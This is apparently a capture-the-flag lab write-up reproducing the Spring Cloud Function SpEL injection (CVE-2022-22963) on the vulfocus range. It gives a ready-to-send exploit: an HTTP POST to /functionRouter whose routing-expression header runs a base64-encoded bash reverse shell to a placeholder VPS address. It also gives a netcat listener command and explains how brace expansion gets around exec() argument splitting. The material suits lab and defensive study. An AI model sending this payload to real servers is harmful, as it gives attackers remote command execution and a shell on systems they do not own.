1. Reproduction environment
This write-up reproduces the Spring Cloud Function SpEL injection (CVE-2022-22963) on the vulfocus online range: http://vulfocus.io/
2. Building the PoC
From the vulnerability description, the request only needs an extra header named spring.cloud.function.routing-expression; its value is evaluated as a SpEL expression on the server, so a T(java.lang.Runtime) call gives command execution.
The command is not run through a shell: Runtime.exec() splits its single string argument on whitespace and passes the pieces straight to the process, so pipes and redirections such as "|" and ">&" would be treated as literal arguments. The reverse-shell command is therefore base64-encoded, and bash brace expansion ({echo,...} expands to "echo ...") avoids any literal spaces inside the argument that exec() would otherwise split.
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwL3h4Lnh4Lnh4Lnh4LzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}")
The base64 above decodes to bash -i >&/dev/tcp/xx.xx.xx.xx/1234 0>&1; replace xx.xx.xx.xx and 1234 with your own VPS address and listening port and re-encode before use.
Full PoC (the header value must stay on a single line; it is only wrapped here for display):
POST /functionRouter HTTP/1.1
Host: 123.58.236.76:40427
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwL3h4Lnh4Lnh4Lnh4LzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}")
Connection: close
Content-Length: 4
test
3. Start a listener on the VPS
nc -lvvp 5555
The listener port must match the port encoded in the payload (the sample payload above encodes port 1234), so either listen on that port or re-encode the command with 5555 before sending.
4. Send the PoC; the reverse shell connects back
Read the flag from the shell.